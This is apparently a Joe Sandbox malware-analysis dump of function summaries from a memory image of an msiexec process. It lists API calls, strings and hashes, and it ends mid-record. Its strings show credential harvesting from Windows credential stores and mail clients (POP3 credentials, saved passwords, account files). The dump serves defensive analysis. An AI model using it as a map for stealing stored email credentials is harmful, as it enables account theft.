                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                APIs
                                                                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                • wcslen.MSVCRT ref: 0040874A
                                                                                • wcsncmp.MSVCRT ref: 00408794
                                                                                • memset.MSVCRT ref: 0040882A
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                • wcschr.MSVCRT ref: 0040889F
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                • String ID: J$Microsoft_WinInet
                                                                                • API String ID: 3318079752-260894208
                                                                                • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004037EB
                                                                                • memset.MSVCRT ref: 004037FF
                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                • strlen.MSVCRT ref: 00403897
                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                • String ID: %s@yahoo.com
                                                                                • API String ID: 2240714685-3288273942
                                                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                APIs
                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                • API String ID: 888011440-2039793938
                                                                                • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                APIs
                                                                                  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                • strchr.MSVCRT ref: 0040327B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringstrchr
                                                                                • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                • API String ID: 1348940319-1729847305
                                                                                • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                • API String ID: 3510742995-3273207271
                                                                                • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F567
                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                • String ID:
                                                                                • API String ID: 78143705-3916222277
                                                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                APIs
                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                  • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                • strlen.MSVCRT ref: 00403778
                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                • String ID: %s@gmail.com
                                                                                • API String ID: 3261640601-4097000612
                                                                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004094C8
                                                                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                • memset.MSVCRT ref: 0040950C
                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                • _strcmpi.MSVCRT ref: 00409531
                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 3411445237-4169760276
                                                                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403504
                                                                                • memset.MSVCRT ref: 0040351A
                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscatmemset$_mbscpystrlen
                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                • API String ID: 632640181-966475738
                                                                                • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                APIs
                                                                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                • String ID:
                                                                                • API String ID: 3642520215-0
                                                                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                • GetDC.USER32(00000000), ref: 004072FB
                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                • String ID:
                                                                                • API String ID: 1999381814-0
                                                                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset
                                                                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                • API String ID: 1297977491-3883738016
                                                                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                APIs
                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: gj
                                                                                • API String ID: 438689982-4203073231
                                                                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm$__aullrem
                                                                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                • API String ID: 643879872-978417875
                                                                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040810E
                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CE7B60,?), ref: 004081B9
                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                • API String ID: 524865279-2190619648
                                                                                • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2300387033-3849865405
                                                                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004076D7
                                                                                • sprintf.MSVCRT ref: 00407704
                                                                                • strlen.MSVCRT ref: 00407710
                                                                                • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                • strlen.MSVCRT ref: 00407733
                                                                                • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                • String ID: %s (%s)
                                                                                • API String ID: 3756086014-1363028141
                                                                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$memsetsprintf
                                                                                • String ID: %2.2X
                                                                                • API String ID: 125969286-791839006
                                                                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                APIs
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                • String ID: ACD
                                                                                • API String ID: 82305771-620537770
                                                                                • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
